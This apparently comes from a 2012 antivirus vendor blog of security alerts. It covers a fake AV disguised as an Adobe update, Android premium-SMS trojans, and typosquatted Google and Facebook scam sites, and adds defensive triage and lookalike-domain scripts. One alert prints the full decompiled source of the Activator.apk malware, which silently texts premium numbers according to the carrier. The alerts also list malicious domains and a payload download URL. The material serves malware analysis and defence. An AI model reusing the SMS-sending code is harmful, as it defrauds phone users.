[ Security Alert ]
30 July, 2012 15:16
Security Alert 2012-07-30: Fake AV Tricks Victims as Adobe Update
Last week, AegisLab found a suspicious domain name: hxxp://adobe-upgrade.org/w.php?f=28f52. Does it look like an official Adobe domain? It is not. It was registered by an attacker to trick victims into downloading a malicious program. After analyzing the program in depth, we found that it is a fake AV. Once installed, it shows a virus scanning page (Figure 1) that reports how many files on the computer are "infected". The results are fabricated, but the machine really is infected once the "scan" finishes.
VirusTotal details:
SHA256: e69d29b7b09449e64474b0caed08461f527b9ce1577f95f4ef3409e7424d5e36
SHA1: b0742f1f07e30620d0643029375786873d897177
MD5: 4c57cf16bbe1e1f5e8e38b3773f5e07a
File size: 404.0 KB (413696 bytes)
File name: about.exe
File type: Win32 EXE
Tags: peexe armadillo
Detection ratio: 7 / 41
Analysis date: 2012-07-23 05:55:56 UTC
The armadillo tag means the executable is wrapped in the Armadillo protector, so static signatures see the packer stub rather than the payload; this is one reason the detection ratio is so low at the time of analysis.
Figure 1: Fake virus scan page
By AegisLab
[ Security Alert ]
27 July, 2012 10:18
Security Alert 2012-07-26: Fake Adobe Flash Player Lures Android Users to Install
AegisLab discovered a fake Adobe Flash Player app in a third-party market in Russia. It is actually a variant of FakeInst (aka OpFake, SMSSend or TrojanSMS), which tricks the victim into downloading and installing it and then sends SMS messages to premium-rate numbers. The VirusTotal detection rate is shown below:
SHA256: 95781ff40529e6647f02e96e96c2f5d86a31cf9d2f02592d6b7666068925a225
SHA1: a04718f91e86ee6619f910c76509c0e16724c356
MD5: 0d8d9ad5a98ce9d77462779036cf0295
File size: 317.0 KB (324634 bytes)
File name: adobe_flash_player_v10.3.185.25_installer.apk
File type: Android
Tags: android
Detection ratio: 2 / 41
Analysis date: 2012-07-26 06:47:48 UTC
After analyzing this malicious app and following the convoluted chain of hyperlinks inside it, we found that the following Android markets (or websites) are all malicious and host many malicious APKs (some of the hosted apps are normal):
- androidmir.com and android-mir.com (Figure 1)
- myadroidmaklet.net (Figure 2)
- filedats.net (Figure 3)
- file77mibi.net
- androidmarkt.ru
Figure 1: androidmir.com
Figure 2: myadroidmaklet.net
Figure 3: filedats.net
How did we find the above websites? One day, while our WebGuard team was patrolling the Internet, a researcher found a suspicious link to an Android APK called "Cool Reader". The link is neither simple nor direct: it redirects you to another page and then jumps to yet another site in order to evade detection and tracking. Once you have installed the app, the fake app issues an urgent update notification that tricks you into downloading another app. The following figures show the whole sequence of tricks:
Figure 4: Cool Reader
Figure 5: fake installation process
Figure 6: fake disclaimer (can you see the notification in the upper-left corner?)
Figure 7: try to download another app
Figure 8: fake login page (just pressing Enter is enough)
Figure 9: lures you to the link http://androidmir.com/download/cr3-0-45-07.apk (the link does not exist)
Figure 10: the urgent update notification for Adobe Flash Player
Figure 11: connect to myadroidmaklet.net
While installing the fake Adobe Flash Player, you will see that it requests permissions to read and send SMS, read contact data and read the GPS location (Figures 12 and 13). The real Adobe Flash Player does not need such permissions.

Figures 12 and 13: fake Adobe Flash Player
Once the installation completes, you will find a shortcut on the home screen. After clicking it, a "Browser" app is downloaded and installed (Figures 14 and 15). The "Browser" app requests the same permissions as the fake Adobe Flash Player (Figures 16 and 17).
Figures 14 and 15: update the browser? (just a trick)

Figures 16 and 17: fake Browser
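The permission mismatch described above is the quickest triage check for this family: a Flash plugin needs network access, not SMS, contacts or location. The script below is an added example (not AegisLab's code) that parses a text-form AndroidManifest.xml and reports every permission with no plausible use in a browser plugin. The two manifests embedded in it are constructed for illustration: the first mirrors what the screenshots of the fake Flash Player show, the second is a network-only control. Real APKs store the manifest as binary XML, so decode it first with `apktool d app.apk` or list permissions directly with `aapt dump permissions app.apk`.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS

# Permissions a browser plugin has no reason to hold, with the abuse each one enables.
# SEND_SMS together with RECEIVE_SMS is the classic premium-SMS pairing: send to a
# short code and intercept the carrier's reply so the victim never sees the charge.
SUSPICIOUS = {
    "android.permission.SEND_SMS": "send premium-rate SMS",
    "android.permission.RECEIVE_SMS": "intercept incoming SMS (hide billing confirmations)",
    "android.permission.READ_SMS": "read stored SMS",
    "android.permission.READ_CONTACTS": "harvest contacts for further spam",
    "android.permission.ACCESS_FINE_LOCATION": "track the device location (GPS)",
    "android.permission.ACCESS_COARSE_LOCATION": "track the device location (network)",
}


def requested_permissions(manifest_xml):
    """All <uses-permission android:name=...> values, in manifest order."""
    root = ET.fromstring(manifest_xml)
    return [el.get(NAME_ATTR) for el in root.iter("uses-permission") if el.get(NAME_ATTR)]


def triage(manifest_xml):
    """Return {permission: why it is suspicious} for every flagged permission."""
    return {p: SUSPICIOUS[p] for p in requested_permissions(manifest_xml) if p in SUSPICIOUS}


# Constructed sample manifests; neither is taken from a real APK.
FAKE_FLASH_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.fakeflash">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <application android:label="Adobe Flash Player"/>
</manifest>"""

BENIGN_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.plugin">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Plugin"/>
</manifest>"""

if __name__ == "__main__":
    for name, manifest in (("fake flash", FAKE_FLASH_MANIFEST), ("benign", BENIGN_MANIFEST)):
        hits = triage(manifest)
        print(f"{name}: {'SUSPICIOUS' if hits else 'ok'}")
        for perm, why in hits.items():
            print(f"  {perm}: {why}")
```

The check is deliberately a allowlist-free heuristic: it does not try to decide what a given app should request, only which requested permissions make no sense for the app's stated purpose. That is exactly the reasoning a user can apply on the install screen, and it is what the screenshots in Figures 12 and 13 give away.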
Yes, this kind of attack is old-fashioned and nothing special, but Android users keep being tricked by it. AegisLab reminds you to download apps only from trusted Android markets, never click suspicious links, and install AegisLab Antivirus.
By AegisLab
[ Security Alert ]
24 July, 2012 18:15
Security Alert 2012-07-24: Another Google Service: File Search?
AegisLab discovered a Russian website called "google-file.com" which has a Google-style look (Figure 1). It is not an official Google service but a premium-rate SMS scam. If you want to download a file (Figure 2), you first have to enter your phone number (Figure 3), and the page then tells you to send texts to a specific number in order to "verify your identity" (Figure 4). Finally, your money flies away (Figure 5).
Figure 1: Google-File.com
Figure 2: File to download
Figure 3: Input your phone number
Figure 4: Send premium-rate SMS to specific number
Figure 5: so many complaints to google-file.com
We also found that "google-fiile.mk3k.ru", "google-fille.org" and "google-fiile.org" redirect to google-file.com. AegisLab WebGuard has blocked all four websites.
By AegisLab
[ Security Alert ]
20 July, 2012 14:33
Security Alert 2012-07-20: Analyze the 2nd stage infection (Activator.apk) of Malicious "Super Mario Bros." App
Last week, AegisLab published 「Security Alert 2012-07-12: Malicious "Super Mario Bros." App in Google Play」, in which we mentioned that the second-stage infection tries to download an APK called "Activator.apk". Its decompiled code is listed below (the SMS-sending parts were highlighted in red in the original post):
-----------------------------------------------------------------------
package com.activator;

import android.app.Activity;
import android.app.AlertDialog;
import android.content.DialogInterface;
import android.os.Bundle;
import android.telephony.SmsManager;
import android.telephony.TelephonyManager;
import java.util.Random;
import java.util.regex.Pattern;

public class ActivatorActivity extends Activity
{
    TelephonyManager TM;
    AlertDialog.Builder builder;
    String operator;

    // Sends one SMS with no sent/delivered PendingIntents, so the user sees nothing.
    private void sendSMS(String number, String message)
    {
        SmsManager.getDefault().sendTextMessage(number, null, message, null, null);
    }

    protected void onCreate(Bundle savedInstanceState)
    {
        super.onCreate(savedInstanceState);
        setContentView(2130903040); // R.layout resource id, left as the decompiler emitted it
        this.TM = (TelephonyManager) getSystemService("phone");
        this.operator = this.TM.getSimOperatorName();

        // The decompiler emitted a while(true)/continue loop here; the branches below are
        // the same logic written as a plain if/else chain.
        if (Pattern.matches("[bBeEeE]*", this.operator.substring(0, 3)))
        {
            // First three characters are only b/B/e/E, e.g. "Bee" (Beeline)
            int k = 1 + new Random().nextInt(10000);
            startProgress("1518", "DEF1773");
            startProgress("3170", "4037" + k);
            setResult(1);
            finish();
        }
        else if (Pattern.matches("[mMtTsS]*", this.operator.substring(0, 3)))
        {
            // First three characters are only m/M/t/T/s/S, e.g. "MTS"
            int j = 1 + new Random().nextInt(10000);
            startProgress("770656", "DEF1773");
            startProgress("3170", "4037" + j);
            setResult(1);
            finish();
        }
        else if (this.operator.equalsIgnoreCase(""))
        {
            // No SIM operator name: show a fake "wallpaper database" error and exit without sending.
            this.builder = new AlertDialog.Builder(this);
            this.builder.setCancelable(false);
            // Russian: "Error while loading the wallpaper database. Please try again later."
            this.builder.setMessage("Ошибка при загрузке базы обоев. Попробуйте позже.");
            this.builder.setNeutralButton("OK", new DialogInterface.OnClickListener()
            {
                public void onClick(DialogInterface dialog, int which)
                {
                    ActivatorActivity.this.setResult(0);
                    ActivatorActivity.this.finish();
                }
            });
            this.builder.create().show();
        }
        else
        {
            // Any other operator: only the common premium message is sent.
            int i = 1 + new Random().nextInt(10000);
            startProgress("3170", "4037" + i);
            setResult(1);
            finish();
        }
    }

    // Sends each SMS from its own background thread.
    public void startProgress(final String number, final String message)
    {
        new Thread(new Runnable()
        {
            public void run()
            {
                ActivatorActivity.this.sendSMS(number, message);
            }
        }).start();
    }
}
-----------------------------------------------------------------------
Basically, it sends different messages to different numbers depending on the SIM operator name. Note that Pattern.matches() requires the whole input to match, so each check asks whether all three leading characters of the operator name come from the given character class:
operator = getSimOperatorName()
Case 1: Pattern.matches("[bBeEeE]*", operator.substring(0, 3)), i.e. the first three characters consist only of b/B/e/E, which matches "Bee" (Beeline)
number=1518, message="DEF1773"
number=3170, message="4037" + a random number from 1 to 10000
Case 2: Pattern.matches("[mMtTsS]*", operator.substring(0, 3)), i.e. the first three characters consist only of m/M/t/T/s/S, which matches "MTS"
number=770656, message="DEF1773"
number=3170, message="4037" + a random number from 1 to 10000
Case 3 (neither case 1 nor case 2, and the operator name is not empty)
number=3170, message="4037" + a random number from 1 to 10000
If the operator name is empty, an alert dialog pops up: "Ошибка при загрузке базы обоев. Попробуйте позже." (roughly, "Error while loading the wallpaper database. Please try again later."). Because "Super Mario Bros." masquerades as a wallpaper app, this message is just part of the disguise.
One caveat on the listing as decompiled: the substring(0, 3) checks run before the empty-name check, so an operator name shorter than three characters would throw a StringIndexOutOfBoundsException before the dialog branch is reached.
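To turn the dispatch table above into something an analyst can query (which numbers and message bodies a given SIM would trigger), here is an added Python emulation of the decompiled logic. It is not AegisLab's code and is not taken from the sample; the premium numbers, message bodies and regexes are exactly those in the listing, while the operator names fed to it are constructed examples. One detail worth keeping: Java's Pattern.matches() is a full match, so the Python equivalent is re.fullmatch(); re.match() would wrongly accept "Bel..." because of the trailing "*".

```python
import random
import re

# Character classes from the listing. fullmatch() mirrors Java's Pattern.matches().
BEELINE_RE = re.compile(r"[bBeEeE]*")   # full-matches "Bee" (Beeline)
MTS_RE = re.compile(r"[mMtTsS]*")       # full-matches "MTS"

# Premium numbers and message bodies exactly as they appear in the decompiled code.
BEELINE_TARGET = ("1518", "DEF1773")
MTS_TARGET = ("770656", "DEF1773")
COMMON_NUMBER = "3170"
COMMON_PREFIX = "4037"


def activator_targets(operator_name, rng=None):
    """Return the list of (number, message) pairs Activator would send for the given
    getSimOperatorName() value, or None when it would show the fake error dialog.

    rng is optional so the random suffix can be made reproducible; the malware uses
    1 + new Random().nextInt(10000), i.e. an integer from 1 to 10000 inclusive.
    """
    rng = rng if rng is not None else random.Random()
    if operator_name == "":
        return None  # fake "wallpaper database" dialog, nothing sent
    if len(operator_name) < 3:
        # substring(0, 3) in the listing throws here; mirror that instead of guessing.
        raise ValueError("operator name shorter than three characters")
    prefix = operator_name[:3]
    common = (COMMON_NUMBER, COMMON_PREFIX + str(rng.randint(1, 10000)))
    if BEELINE_RE.fullmatch(prefix):
        return [BEELINE_TARGET, common]
    if MTS_RE.fullmatch(prefix):
        return [MTS_TARGET, common]
    return [common]


# Constructed operator names for illustration; real getSimOperatorName() values vary by SIM.
SAMPLE_OPERATORS = ["Beeline", "MTS RUS", "MegaFon", "Tele2", ""]


def summarize(names, seed=0):
    """Map each operator name to the SMS it would trigger, with a fixed seed for repeatability."""
    rng = random.Random(seed)
    return {name: activator_targets(name, rng) for name in names}


if __name__ == "__main__":
    for name, targets in summarize(SAMPLE_OPERATORS).items():
        print(f"{name!r:12} -> {targets}")
```

Running it shows that every victim with a SIM pays at least the "4037..." message to 3170, and that Beeline and MTS subscribers additionally pay for the "DEF1773" message to a second short code; the emulation is a convenient way to derive per-carrier indicators without running the APK.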
By AegisLab
[ Security Alert ]
12 July, 2012 17:57
Security Alert 2012-07-12: Malicious "Super Mario Bros." App in Google Play
According to the Symantec and F-Secure blogs, a malicious "Super Mario Bros." app was available in Google Play for several days. It looks like an action game, but after installation the icon reads "Mario HD Wallpaper", as in Figure 2. Google Play has removed this app and several related apps by the same developer, but you can still find them in third-party markets, as in Figure 1. This app uses a two-stage (or multi-stage) infection technique to evade Google Play review. Simply put, the first-stage app is usually harmless, and the second stage downloads malicious content or another malicious APK to install.
In this app (Super Mario Bros.), we found three malicious Dropbox links; they all point to http://dl.dropbox.com/u/87265868/Activator.apk.
Obviously, the second stage downloads and installs "Activator.apk". Once installed, "Activator" is launched, sends premium-rate SMS messages (targeting the Eastern European area) and finally uninstalls itself.
Figure 1: We discovered it on 3rd-party market.
Figure 2: "Mario HD Wallpaper"
Figure 3: Russian disclaimer
Figure 4: Russian disclaimer
Figure 5: AegisLab Antivirus detected
VirusTotal detection rate:
According to the developer information, AegisLab discovered 5 related apps by the same developer, and AegisLab Antivirus detects them all.
By AegisLab
[ Security Alert ]
12 July, 2012 13:55
Security Alert 2012-07-12: Facebook URL Hijacking (updated)
Remember the security alert we published before, 「Security Alert 2012-05-29: Facebook URL Hijacking」? AegisLab has now found that the websites at facenook.com and facevook.com look even more like the official Facebook site, as in Figure 1.
Figure 1: Look so similar as Facebook style
Once you enter the page, you hear a recorded voice say:
"You have been selected to take part in our anonymous survey!
Complete this 30 second questionnaire, and to say "thank you", we'll offer you an exclusive gift."
Click the "Start" button and then fill in the answers:
Figure 2: Answer the questions
After answering all 5 questions, a page claiming you have won a Best Buy or Walmart gift card pops up, as in Figure 3. (Don't even think about it; you will never receive the prize!)
Figure 3: Choose the gift card
After choosing the gift card you want, you have to enter your cell phone number and e-mail address, as in Figure 4. (Don't do that!)
Figure 4: Fill-in cell phone number and e-mail address
Congratulations! You have finished the questionnaire, but all in vain, except for leaking your personal information (and you will get more spam).
By AegisLab
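Every domain in these alerts (adobe-upgrade.org in the fake AV alert, the google-file.com variants in the "Google File Search" alert, facenook.com and facevook.com here) trades on a brand name with a small spelling change or an added word. The following is an added example, not AegisLab's WebGuard logic, of the lookalike check a URL filter can apply: strip the scheme (including hxxp:// defanging), drop the TLD, and flag any label that uses a brand verbatim, embeds it at an edge, or sits one or two edits away from it. The brand list, the allowlist of legitimate domains and the sample hosts are constructed for illustration.

```python
import re

BRANDS = ("google", "facebook", "adobe", "android")
# Minimal constructed allowlist; anything under these domains is never flagged.
LEGIT = ("google.com", "facebook.com", "adobe.com", "android.com")


def hostname(url):
    """Lower-case host from a URL or bare host; tolerates hxxp:// defanging and ports."""
    host = re.sub(r"^[a-z]+://", "", url.strip().lower())
    return host.split("/")[0].split("?")[0].split(":")[0]


def levenshtein(a, b):
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(url):
    """Return (brand, offending label or token, distance) if the host impersonates a brand,
    or None for allowlisted or unrelated hosts."""
    host = hostname(url)
    if any(host == d or host.endswith("." + d) for d in LEGIT):
        return None
    labels = host.split(".")[:-1]  # every label except the TLD
    for label in labels:
        tokens = label.split("-")
        for brand in BRANDS:  # 1. brand used verbatim: adobe-upgrade, google-fiile
            if brand in tokens:
                return (brand, label, 0)
        for brand in BRANDS:  # 2. brand glued to extra text: androidmir
            if label != brand and (label.startswith(brand) or label.endswith(brand)):
                return (brand, label, len(label) - len(brand))
        for brand in BRANDS:  # 3. a typo away: facenook, facevook
            limit = 1 if len(brand) < 8 else 2
            for token in [label] + tokens:
                d = levenshtein(token, brand)
                if 0 < d <= limit:
                    return (brand, token, d)
    return None


# Constructed sample list: hosts named in these alerts plus two legitimate controls.
SAMPLES = [
    "hxxp://adobe-upgrade.org/w.php?f=28f52",
    "google-file.com", "google-fiile.mk3k.ru", "google-fille.org", "google-fiile.org",
    "facenook.com", "facevook.com",
    "androidmir.com", "android-mir.com",
    "www.google.com", "m.facebook.com",
]


def scan(urls):
    """Map each input to its lookalike verdict."""
    return {u: lookalike(u) for u in urls}


if __name__ == "__main__":
    for url, verdict in scan(SAMPLES).items():
        print(f"{url:42} {verdict}")
```

Rule 3 is where false positives live: short brand names with a limit of one edit are safe enough, but longer brands with a limit of two will occasionally catch unrelated words, so in practice the verdict is a score that feeds a blocklist review rather than an automatic block. Rule 2 is deliberately loose as well; it catches androidmir.com and android-mir.com, which no edit-distance threshold would.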